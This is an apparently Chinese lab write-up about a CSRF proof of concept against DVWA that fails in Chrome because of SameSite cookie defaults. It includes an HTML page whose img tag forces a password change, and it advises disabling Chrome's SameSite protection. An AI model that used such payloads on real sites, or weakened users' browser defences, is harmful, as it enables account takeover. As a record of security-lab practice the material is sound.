DVWA-CSRF攻击失败（chrome浏览器）

问题：在使用chrome浏览器测试 DVWA 中的 CSRF时，没有发送cookie

POC：

<html>
    <head>
        <meta charset="utf-8">
    </head>
    <body>
        <img src="http://ipi地址/DVWA-master/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change" alt="图片加载失败,请检查网络"> 
        <script>document.csrf.submit()</script>
    </body>
</html>

思路：

尝试其他浏览器，确认是否由浏览器引起

 

排查：

1、尝试其他浏览器后，发现可以正常攻击

2、回来继续分析chrome没成功的原因，分析请求头发现没有发送cookie信息到服务器，并且响应头中发现有异常

 

 警告内容：

This set-cookie didn't specify a "SameSite" attribute and was defaulted to "SameSite=Lax" and broke the same rules specified in the SameSiteLax value

 

结果：

查询了相关资料发现在chrome 80 之后，该浏览器的cookie机制新增了SameSite属性，我的理解是相当于验证Referer。解决办法--禁用SameSite属性，或者设置SameSite的值为None

1、禁用SameSite

访问：chrome://flags/#same-site-by-default-cookies

 

 

 

2、设置SameSite的值为None(我没测试)

 　　要求：同时设置Secure属性